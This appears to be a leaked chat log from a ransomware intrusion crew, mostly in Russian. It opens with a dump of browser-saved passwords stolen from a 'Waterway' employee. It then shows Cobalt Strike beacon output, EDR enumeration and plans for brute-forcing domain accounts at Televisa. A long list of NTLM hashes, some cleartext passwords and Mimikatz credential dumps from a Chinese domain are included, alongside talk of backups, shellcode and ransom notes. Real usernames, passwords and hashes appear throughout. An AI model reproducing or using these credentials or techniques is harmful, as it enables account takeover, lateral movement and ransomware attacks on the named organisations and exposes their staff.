C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login5.silverpop.com/,https://login5.silverpop.com/login,1/27/2017 10:17:28 AM,13130007448689450,transact@waterway.com,Waterway!999
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,GKoct2020!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sandbox.authorize.net/,https://sandbox.authorize.net/UI/themes/anet/logon.aspx,3/3/2017 1:32:50 PM,13133043170642560,gkeller727,GKoct2020!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway.pingboard.com/,https://waterway.pingboard.com/invitation/accept,1/22/2018 2:49:00 PM,13161127740422083,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.authorize.net/,https://login.authorize.net/,7/21/2018 8:03:37 AM,13176651817834997,gkeller727,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://id.atlassian.com/,https://id.atlassian.com/signup/invite,11/15/2017 9:45:06 AM,13155234306572101,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sso-prod.insite360.gilbarco.com/,https://sso-prod.insite360.gilbarco.com/auth/realms/people/login-actions/authenticate,1/19/2017 9:11:07 AM,13129312267171112,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://invitations.microsoft.com/,https://invitations.microsoft.com/signup,9/24/2018 1:18:57 PM,13182286737852274,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://pdiconnections.force.com/,https://pdiconnections.force.com/pdiconnections/Login,8/4/2017 8:50:19 AM,13146328219423516,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://pdiprodweb/,http://pdiprodweb/FocalPoint/Login.aspx,1/26/2018 9:18:55 AM,13161453535823207,waterway\gkeller,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://itprograms/,http://itprograms/pro_users/login,1/18/2017 6:03:47 PM,13129257827373174,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://github.com/,https://github.com/session,1/18/2017 6:28:21 PM,13129259301326003,gkellerww,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://smartscan.controlscan.com/,https://smartscan.controlscan.com/security/index/0/overview,1/3/2019 2:56:52 PM,13191022612362998,650000010503764,u7i2jwPWZdfCwcU
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://auth.monday.com/,https://auth.monday.com/users/invitation/accept,12/31/1600 6:00:00 PM,0,Greg Keller,kJHA2x9qfXmFM6U
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterwaytraining.litmos.com/,https://waterwaytraining.litmos.com/account/Login,2/25/2019 3:37:37 PM,13195604257652268,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway.zendesk.com/,https://waterway.zendesk.com/auth/v2/login/email_verification,3/30/2019 8:15:40 AM,13198425340398832,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://atlas.technologypartners.net/,https://atlas.technologypartners.net/jira/login.jsp,4/18/2019 10:08:50 AM,13200073730330373,mharper,.V)59n-UW4#Y{6bY
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://itprograms/,http://itprograms/,2/17/2017 11:09:05 AM,13131824945466325,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://ww5.autotask.net/,https://ww5.autotask.net/,9/11/2017 1:48:39 PM,13149629319827394,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://authentication.logmeininc.com/,https://authentication.logmeininc.com/,11/2/2017 10:23:35 AM,13154109815128559,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.zoho.com/,https://accounts.zoho.com/,7/5/2018 3:02:43 PM,13175294563791286,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://ntwkmtrpc/,http://ntwkmtrpc/,10/19/2017 11:09:13 AM,13152902953441972,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://wwsql01/,http://wwsql01/,1/8/2018 12:59:19 PM,13159911559498999,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.paycomonline.net/,https://www.paycomonline.net/,3/15/2018 11:38:53 AM,13165605533722509,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://mail.datotel.com/,https://mail.datotel.com/,5/23/2018 1:50:56 PM,13171575056275769,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.nationalcar.com/,https://www.nationalcar.com/,6/15/2017 10:55:12 AM,13142015712132139,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://gkeller.waterway.com:8080/,http://gkeller.waterway.com:8080/,10/24/2017 12:05:56 PM,13153338356438715,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://localhost:8080/,http://localhost:8080/,2/17/2017 11:39:28 AM,13131826768206820,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sa.dor.mo.gov/,https://sa.dor.mo.gov/,3/7/2017 8:33:07 AM,131333707864092,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/,8/28/2017 11:22:05 AM,13148410925787355,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.opentable.com/,https://www.opentable.com/,2/7/2017 3:51:28 PM,13130977888943168,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,android://OrDksZTeY8ETlesJhBbFVR5KTnBdNkWQ5Rxr1jC3Ac3IfK3DjmDoQnD696F2RbgyDhHen6KuHKtDv3rv0LYZBA==@com.safetyculture.iauditor/,android://OrDksZTeY8ETlesJhBbFVR5KTnBdNkWQ5Rxr1jC3Ac3IfK3DjmDoQnD696F2RbgyDhHen6KuHKtDv3rv0LYZBA==@com.safetyculture.iauditor/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,android://Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient/,android://Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway1578930554.zendesk.com/,https://waterway1578930554.zendesk.com/auth/v2/login/signin,1/15/2020 10:05:51 AM,13223577951113149,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://app.hotschedules.com/,https://app.hotschedules.com/hs/login.jsp,3/2/2020 12:41:12 PM,13227648072628460,2120689,1534603
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.coach.com/,https://www.coach.com/,4/28/2020 1:34:44 PM,13232572484452463,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://localhost:3000/,http://localhost:3000/,4/29/2020 12:31:19 PM,13232655079442330,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://wwng-stage-ui.azurewebsites.net/,https://wwng-stage-ui.azurewebsites.net/,5/4/2020 12:29:24 PM,13233086964594837,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://onenote.officeapps.live.com/,https://onenote.officeapps.live.com/,5/26/2020 1:35:43 PM,13234991743323159,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,android://sYsSllycB0V7gxpC4P7xYw9xD8SF41a-b_d5oxxl-E8RHZ9FH7IRXMMMfWPlrkMWPfdYSHz8fzvC0NguZ54U8w==@com.robinhood.android/,android://sYsSllycB0V7gxpC4P7xYw9xD8SF41a-b_d5oxxl-E8RHZ9FH7IRXMMMfWPlrkMWPfdYSHz8fzvC0NguZ54U8w==@com.robinhood.android/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterwaycarwash.monday.com/,https://waterwaycarwash.monday.com/,9/28/2020 2:16:42 PM,13245794202143373,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.facebook.com/,https://www.facebook.com/,9/28/2020 4:47:40 PM,13245803260898448,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://lastpass.com/,https://lastpass.com/,10/8/2020 8:47:08 AM,13246638428429684,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.mockflow.com/,https://www.mockflow.com/,11/9/2020 5:04:30 PM,13249436670654041,gkeller@waterway.com,Waterway99

````http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:37 AM,13134500857385618,Admin,1Vanilla2`[ ](https://mediaeveryone.com/group/waterway-com?msg=yrYtJKNMZe8Cs4fL4) нет, сейчас всё подготовим и можно закрывать``
--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W

--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 65000001503764
Password : u7i2jwPWZdfCwcU

--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

```у вас много тут дел осталось?`\\GKELLER\G$\WW2k1\IT\SolarwindsBackups``\GKELLER\G$\Backup`крч вот``
Teemo[PDIPRODWEB]SYSTEM */728|20Dec26 20:50:43> shell net view \\DRB2 /all
[Tasked beacon to run: net view \\DRB2 /all
[+] host called home, sent: 51 bytes
[+] received output:
Shared resources at \\DRB2



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
Archive Disk
Backup Disk
C$ Disk Default share
E$ Disk Default share
Install Disk
IPC$ IPC Remote
Log Disk
MailMerge Disk
Media Disk
Replication Disk
SiteWatch Disk
The command completed successfully.

``````
\\DRB2\Archives
\\DRB2\Backup
\\DRB2\Replication
```
ещё бэкапы``
GKELLER.WATERWAY.COM
MIKEP16.WATERWAY.COM
BLAUERPC.WATERWAY.COM
U06NEWOFFICEPC.WATERWAY.COM
MHARPERNEW.WATERWAY.COM
``user3@tl1
добавь @user3 сюда пожайлуста`SYSTEM *@192.168.0.222 (WWDC2)`прилетело ?сейчас пасну ватервэйнееwaterway?я даже не успел проверить ДКне получится, она сдохлаrepdot.comдай пасс сессии мнеесли там записки нетвот этотfrancedc1и проверь дкага спскрасаучег, ок сейчас долочудолочишь остатки по рт?так вот надополтора тб забилитакие дела` 4405 File(s) 1,452,604,853,672 bytes
`хитер лис)как?АВ - битдэфендер
виам - veeam_admin a313f6cf5fb92a96195435f9a6e4b5a9
c гипервивером пока ещё разбираюсь
нашёл способ как прыгать по тачкам чтобы АВ не выёбывался (хз сильно паливно или нет)ав, виам и т дну мы поняли про бэкапы)ту у нас что?`\BLAUERPC\D$` бэкапыуже дело`bdredline.exe ` его пропустил``
[+] Determining what EDR products are installed on wwdc2...
[+] gzflt.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] BitDefender Found!
``если бы админ руками выпилил все сесси бы отватились из за домена в ЧСон мониторит активность и алертитне ав средство жетак мониторинг`Solarwinds` вроде мониторинга едрквери что сказалпоробовал прыгнуть на тачку и длку ав сожрал, хотя когда смотрел тасклист не замечал там чегото подобногоцэлых 7это я для себя, hv нашёлчто это?```
Shared resources at \\WWSQL2

My business server

Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
barcode Disk
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
Company Disk Company
E$ Disk Default share
F$ Disk Default share
File History Backups Disk
Folder Redirection Disk Folder Redirection
FTP Disk
G$ Disk Default share
IPC$ IPC Remote IPC
Shared Folders Disk
TrackIt Disk
Users Disk Users
``````
Server Name Remark

-------------------------------------------------------------------------------
\\ANDREWNEW
\\BLAUERPC BLauerPC
\\CATHYDESKTOP
\\CATHYNEW
\\CBUSERPC
\\CSTORENEW
\\DANIELLEMOYNE
\\DAVESOFFICEPC
\\DJARDEN
\\DJBROWNXPS
\\DRB2
\\GKELLER
\\HENERYSNEWPC
\\ITPROGRAMS
\\IWASH99
\\JAMIENEW
\\KANTRELLNEW
\\KEVINPC
\\LAB-OFFICE
\\LOYALTYTEST
\\LWINSTON
\\MACMINI-EDC269 Waterway's Mac mini
\\MARKETINGNEW
\\MELISSASNEWPC
\\MHARPERNEW
\\MIKEGNEWPC
\\MISSYSNEWPC
\\MORNINGREPORTPC
\\MUNGERPC
\\MWEISSDESKTOP
\MWITKOWSKINEW
\\NEWPCFORSOMEONE
\\NTWKMTRPC
\\PDIPRODSQL
\\PDIPRODWEB
\\RECRUITINGNEW
\\REPORTING
\\STEPHANIENEW
\\STEVENEW
\\TIFFANYSNEWPC
\\TRAININGPCSTL
\\TSHERIDANNEWPC
\\WW2K1
\\WWDC1
\\WWDC2
\\WWHV01
\\WWHV02
\\WWHV03
\\WWHV04
\\WWSQL
\\WWSQL2 My business server
```:frowning2:-``
Task SvcRestartTask#31841 2/4/2021 3:40:16 PM Ready
``Еще раз попробовал закреп уронить, проверь
```
	CORP.TELEVISA.COM.MX 10.254.0.116 SYSTEM * CORPKLHLRSD01
```
tuxomibo.com до 3 уровня пингуется
kalarada.com до 3 не пингуется, только 1а, тогда есть смысл брутитьсегодня хэш нашела у тебя он изначально был?+живой?там вообще каша
доменных чекнул, там один только
```
* Username : ctxdbadmin
	 * Domain : CORP
	 * NTLM : 7106c947d3a8abbea16cb5448f4ac00a
```а потом в брут)проверь их доступы сначаланачни с доменныхесть и доменные и локальныеа там ЛА доменные пользаки?))))главное не путай password incorrect и access deniedда, в процессеи проверь на другие серверано возьми ЛА на серверах где можешь достатьстраннои он улетел в локаут?и он сразу в лок улетелнет, 1ты 19 раз пробовал?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=uRwtSbnezScksezfK) чекну``

Force user logoff how long after time expires?:       Never
Minimum password age (days): 1
Maximum password age (days): 120
Minimum password length: 12
Length of password history maintained: 6
Lockout threshold: 20
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP
The command completed successfully.


```дай еще net accountsс их хешамила на серверах возьмида не трогай тогдаа, окейя не стал второй раз пробовать хэш, там видимо на него локаут стоит 1 попытка
опять залочуодновременноплюс чекнул бы этот хеш на тех кто в групе Servicio Basico и в групе Domain Admins``
Responsible: Jose Juan Muniz Mendoza. Person in charge 2: Adrián Ruíz Mondragon
```
я бы посмотрел кто эти двое, и если они важны чекнул бы на них хешхеш тоже не катит?так сесия то весит со старм паролемпользуйся моментом)даего включили?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=Xa5s9pour2AfZ9FoF) новых ла как грязи
Administrator практически везде разный* Username : ES050616C
	 * Domain : CORP
	 * NTLM : b7f8b9d8041930f6daed7cb3fb20c6d3
после того как я сунулся на дк))))
```
beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name ES050616C
Full Name Servicio ES050616C
Comment CORP - 4337626 - Alta 13/02/2019 - Responsible: Jose Juan Muniz Mendoza. Person in charge 2: Adrián Ruíz Mondragon
User's comment
Country/region code (null)
Account active Locked
Account expires Never

Password last set 2/4/2021 1:06:21 PM
Password expires 6/4/2021 1:06:21 PM
Password changeable 2/5/2021 1:06:21 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/27/2021 10:13:01 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Servicio Basico *Domain Users
                             *User_PSO *Domain Admins
The command completed successfully.
```

через 10 мин
```

beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name ES050616C
Full Name Servicio ES050616C
Comment CORP - 4337626 - Alta 13/02/2019 - Responsible: Jose Juan Muniz Mendoza. Person in charge 2: Adrián Ruíz Mondragon
User's comment
Country/region code (null)
Account active Yes
Account expires Never

Password last set 2/4/2021 1:23:14 PM
Password expires 6/4/2021 1:23:14 PM
Password changeable 2/5/2021 1:23:14 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/27/2021 10:13:01 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Servicio Basico *Domain Users
                             *User_PSO *Domain Admins
The command completed successfully.
``и net user по немупокажи пожалуйста какой там логин у этого ДА чей хеш была новых локальных админов?(и щас september1нету(аля august1вдруг там сезоный пассчекниклила нет, на cmd5 не проверяла клир7естьа хеш есть?вобщем есть пару тачек куда ходили ДА, надо их мониторитьчуть вылезли из пользовательского сегмента серверов
нашел сервер сессией ДА, но она там еще с августа висит и пароль уже давно поменян(тут без движений?``
CORP\aloar Televisa.2021
CORP\gadiazc Soyelnumero0000001
CORP\kigarciap:::e0d8d7fcb35d2ef4920964532118f4f3:::
CORP\aftapiam:::0246bdc62f0e2c396384b592ef3be354:::
CORP\rsolanobau:::9d057d6ae0251a7c6d0674b26c9aa75c:::
CORP\Vmorenov:::a5bcd1c15d403fbf5c792c66f202e622:::
CORP\jccanoa:::78b75076afd20b0c1765db06e49c9715:::
CORP\clmendozav:::c933798f947972ca9d08ba805008d6ca:::
CORP\evazquezpr:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\Gcastillom:::2441d700356f3ab1d0714db1e9844e60:::
CORP\cagiront:::749ceaca0433d984e0b78c7599a42886:::
CORP\cihernandeza:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\Csegovia:::4efa1df1fdfb9a4ffbda0d00e840ede2::
CORP\Jrivass:::30fe4ab34ce80404f75465fb1b8cb12a:::
CORP\jrortizc:::fff70ea26ce69ae4c02bdce9ef8a4f61:::
CORP\ndjesusg:::34f21309ef327ecd9a852cfb510f4e6d:::
CORP\prangell:::4c07f34762110fa682bd0c6ef54e010d:::
CORP\iperezj:::f651f76a6a087c44698d7741b69c8fa3:::
CORP\Mfremontp:::c4f89225237628041d2303a26ee14007:::
CORP\cmgarciaa:::2029d906714ba0e913d30998533c9063:::
CORP\lgtoledol:::fe2969a54e98a468459022084143e1ec:::
CORP\jvelazquezg:::956e44f5069e8f0161ea7064840894ff:::
CORP\Aventuraj:::5d1dd74b6aeba7121e9324b1285d3739:::
CORP\Fmartinezg:::d9e8da2bb0bf67e9d076f09e29b26a1a:::
CORP\aloar:::4affd6e3e410086d3118d4dfa2ff931a:::
CORP\rcervantesm:::afd011d72ad1a55831d75f33be36d105:::
CORP\Jgonzalezv:::bec80eaa1dcee1f870dfc02808aa1afb:::
CORP\iaguilarr:::4548dea50cdb68bb9e206e4ac758edf3:::
CORP\crayonrod:::9675375a5bd161cd3ca09b9da344b372:::
CORP\jbarrerame:::587ddf743d86b13146415c77106686cf:::
CORP\jmpuentesc:::f93291f941f5387b4dde806e44970a62:::
CORP\chhbautistar:::ecb44fba43525518fd81fbf4453d650b:::
CORP\ammezar:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\gadiazc:::0e4c74096d9998c7a537509f481ee9da:::
CORP\sicabreram:::80537e6fc5a1f37f6ea4b0210af893c5:::
CORP\legutierrezg:::8a40ed074d59774f020fca6ac58d44d5:::
CORP\aafloresga:::986c69e34ac0935fcd39130ff05ad035:::
CORP\vigomezar:::6003c2feccf5eda3bdd18e373885524b:::
CORP\gemorenop:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\eamunozc:::decb62a34748b1dbbfc29124b545cfbc:::
CORP\gafloresso:::cac5c182593a480a05ba20a4e3b197a5:::
CORP\vperezg:::2e8b36ddd8932fa1bf97fa477d5bc565:::
CORP\jorget_wipro:::6460ac17a883c93ed07db8434ddc3f03:::
FILIAL\bmramirezs:::28ccd6f27c8c92346957931f94a1075d:::
FILIAL\pvhernandeza:::8aab1daa12e415eb9a9ad3cbf1692d71:::
FILIAL\Anavarretea:::5cb20c880326791e424fc9f2554ae9b4:::
FILIAL\RociodelaLuzC:::2f4b6c1b63ab9540eb7e087bc0cc2e61:::
```pcsb.org - конфу плзу @user3 впн в работе, можешь к нему+дав смысле помогать?в саппорт)[ ](https://mediaeveryone.com/channel/general?msg=M3Wiw2qsSajQRKZ29) это куда?если сегодня обновят конфиги по впнам, дам в работупока переходи в сапугу(ушла домой тётя, видимо...+разобрали?обнова инжектораобновление разберитедаесть новая коба?я1 человек нужендобавьте в чатили в `CORPSFECRT04` если будет доступенкрч, если впн включен сразу прыгаем в `CORPKIOVDAPGM01`поставилкинул вышедайте шелкодтелевиза прилетел[ ](https://mediaeveryone.com/channel/general?msg=8oQfYvwK867aCbLo3) Обед затяжнойда я в аптеку гонял)
после доставки так сказать, сразу за активирваным углемя тутпришли на работу, пообедали и домой)пообедали...все резко ушли)да блять)@user7 курить пошеля один тут))тогда @user7 дай шелкод[ ](https://mediaeveryone.com/channel/general?msg=qn5jrsA9jZxjAvG76) до магазина видимогу выдать 1 кобу на заменунадолго?он вышел@user9 у тебя только коба вчера умерла?у меня уже грязная капец...вроде только вудукакие кобы вчера в локе учавствовали?дай шелкода позже будут?пока выдать доп нечего(у повторно прогоняюу всех мимо?делай через старый дизайнсейчас весь список переберу и отпишусьхрень какато+@user7 тоже впн@user3 выдам впн для работытак, у нас 2 человека без дел?ну и инвей повешу, правда пока н определился гдепробую все таки определить кто админ, что бы уж определиться - аутсорс у них или нета что в sccy помимо мониторинга?в sccy user4, там же мониторинг
я только в snuв sccy яостальные чем заняты?@user9 в snu и sccyтак на счет сегодняа чет не помню там вообще скулей
проверюскуль сплойты?да я там все проверил
нет уязвимостей
ms17, net_api, smbghost, rdp эксплойтыsccy мониторинг, snu.edu что там осталось проверить?по поводу ваших текущих, там разве есть, что делать?неа, зашли и проверили записку, но больше ничего от skytech не слышно?
у меня есть одна сессия от туда, ни дк, ничего не пингуетсяесть впн snu.edusccy из активнхКакой?у меня на тебя впн выписан, но не вижу инфы о нем никакойЗадавайи у меня к тебе пара вопросовдавай))Как миниму кофе выпитьну задачи текущие какие?не понялу тебя как раз работы нет?)Полагаю в путиа где все?hiВсем приветВисит`wb.zhangna:Zhangna123`net accounts))
```
强制用户在时间到期之后多久必须注销?: 从不
密码最短使用期限(天): 0
密码最长使用期限(天): 42
密码长度最小值: 0
保持的密码历史记录长度: None
锁定阈值: 从不
锁定持续时间(分): 2
锁定观测窗口(分): 2
计算机角色: WORKSTATION
命令成功完成。

``DC
```
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 HZ-DC03 10.246.3.33
 HZ-DC04 10.246.3.34
 BJ-DC03 10.238.8.100
 BJ-DC04 10.238.0.100
 HZ-EQDC08 10.246.101.34
 HZ-EQDC07 10.246.101.33
``````

Authentication Id: 0; 554893 (000000:0008778d)
Session : Interactive from 1
User Name : wb.zhangna
Domain : CN
Logon Server : HZ-EQDC08
Logon Time : 2020/10/26 23:27:44
SID : S-1-5-21-1380817616-3362833225-652976467-106526
	msv :
	 [00000003] Primary
	 * Username : wb.zhangna
	 * Domain : CN
	 * NTLM : 985de1088d5d619c783802e87d1dfea1
	 * SHA1 : 89d60fa07d36dc39fbf2f516b74514db08e25b38
	 * DPAPI: c5af9cdc18387afefdc1024f86b99ed1
	tspkg :
	wdigest:
	 * Username : wb.zhangna
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : wb.zhangna
	 * Domain : CN.NET.NTES
	 * Password : (null)
	ssp :
	credman:

Authentication Id: 0; 553900 (000000:000873ac)
Session : Interactive from 1
User Name : wb.zhangna
Domain : CN
Logon Server : HZ-EQDC08
Logon Time : 2020/10/26 23:27:44
SID : S-1-5-21-1380817616-3362833225-652976467-106526
	msv :
	 [00000003] Primary
	 * Username : wb.zhangna
	 * Domain : CN
	 * NTLM : 985de1088d5d619c783802e87d1dfea1
	 * SHA1 : 89d60fa07d36dc39fbf2f516b74514db08e25b38
	 * DPAPI: c5af9cdc18387afefdc1024f86b99ed1
	tspkg :
	wdigest:
	 * Username : wb.zhangna
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : wb.zhangna
	 * Domain : CN.NET.NTES
	 * Password : (null)
	ssp :
	credman:

Authentication Id: 0; 92375 (000000:000168d7)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2020/10/26 23:27:37
SID : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
	tspkg:
	wdigest:
	 * Username : HIH-D-22925
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : HIH-D-22925$
	 * Domain : cn.net.ntes
	 * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
	ssp :
	CREDMAN:

Authentication Id: 0; 92331 (000000:000168ab)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2020/10/26 23:27:37
SID : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
	tspkg:
	wdigest:
	 * Username : HIH-D-22925
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : HIH-D-22925$
	 * Domain : cn.net.ntes
